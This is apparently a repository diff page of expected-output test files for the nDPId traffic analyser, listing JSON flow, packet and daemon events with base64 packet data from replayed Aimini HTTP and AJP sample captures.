00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="}
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}}
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":139,"packets-processed":133,"total-skipped-flows":0,"total-l4-data-len":79130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1614860229390}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 139/133

24
test/results/ajp.pcap.out
View File

@@ -1,12 +1,12 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ajp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1505154584447}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447}
00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447}
00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447}
@@ -17,13 +17,13 @@
01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"}
